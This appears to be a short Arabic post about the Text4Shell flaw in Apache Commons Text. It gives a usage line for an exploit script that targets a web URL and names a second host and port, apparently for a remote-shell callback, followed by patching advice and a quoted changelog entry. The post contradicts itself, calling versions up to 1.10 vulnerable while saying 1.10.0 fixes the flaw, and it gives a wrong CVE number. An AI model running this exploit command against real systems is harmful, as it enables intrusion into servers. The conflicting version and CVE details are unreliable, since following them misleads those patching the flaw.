
سكربت text4shell لإصدارات text coomons < =1.10 CVE-2022-33980
سكربت text4shell لـ text coomons < =1.10 CVE-2022-33980
python3 text4shell.py -u http://192.168.245.111:8080/search?query= -i 192.168.111.186 -p 22
الحل الرئيسي يتمثل في تحديث مكوّن Apache Commons Text بشكل عاجل إلى الإصدارات المتاحة التي تُصلح هذه الثغرة الأمنية. وتحديدًا، يجب التحديث إلى إصدار 1.10.0 أو أحدث من Apache Commons Text.
في هذا التحديث، تم اختيار تعطيل تلك الاستبدالات الإشكالية افتراضيًا. يتضمن ملف changelog الخاص بالمكتبة التغيير التالي:
اجعل عمليات البحث الافتراضية عن النصوص (string lookups) قابلة للتهيئة عبر خاصية النظام (system property). قم بإزالة عمليات بحث dns وurl وscript من الافتراضيات. إذا كانت هذه العمليات مطلوبة للاستخدام في StringSubstitutor.createInterpolator()، فيجب تمكينها عبر خاصية النظام. راجع StringLookupFactory للحصول على التفاصيل.
نشرت Apache بيانًا رسميًا يتضمن المعلومات الرسمية ومرجعًا إلى التحديث الذي يصحح المشكلة.